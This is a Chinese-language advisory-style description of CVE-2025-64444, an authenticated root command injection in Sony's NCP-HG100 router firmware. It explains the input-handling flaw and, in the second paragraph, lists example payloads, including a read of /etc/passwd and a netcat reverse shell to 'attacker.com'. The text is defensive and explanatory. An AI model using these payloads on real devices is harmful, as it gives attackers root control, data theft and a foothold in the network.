CVE-2025-64444CVE-2025-64444是索尼网络通信公司(Sony Network Communications)生产的NCP-HG100设备中发现的一个高危操作系统命令注入漏洞。该漏洞存在于NCP-HG100 1.4.48.16及更早版本的固件中,源于对用户输入的特殊元素(如分号、反引号、管道符等)未进行充分的过滤和转义处理。攻击者若已获取该设备管理页面的认证凭据,可通过构造恶意命令字符串注入到系统命令中,从而以root权限在目标设备上执行任意操作系统命令。这意味着攻击者可以完全控制设备,窃取敏感信息、植入后门或进行进一步的网络渗透。由于该漏洞需要认证才能利用,因此主要威胁来自内部攻击者或已泄露凭据的场景。CVSS 3.0评分7.2(高危),对机密性、完整性和可用性均造成严重影响。
该OS命令注入漏洞的根本原因在于应用程序对用户可控输入的处理不当。在NCP-HG100的管理Web界面中,某些功能模块直接将用户输入拼接到系统命令中执行,而未进行严格的输入验证和命令转义。攻击者可以利用以下特殊字符构造恶意命令:1)分号(;)用于连接多个命令;2)反引号(`)或$()用于命令替换;3)管道符(|)用于管道操作;4)&&和||用于条件执行。典型的攻击payload可能形如:; cat /etc/passwd、$(whoami) 或 | nc attacker.com 4444 -e /bin/bash。由于Web应用以root权限运行,注入的命令同样以root身份执行,攻击者可直接获得系统的完全控制权。漏洞影响管理界面中的多个功能点,攻击者登录后可针对这些功能发送精心构造的请求,触发命令注入。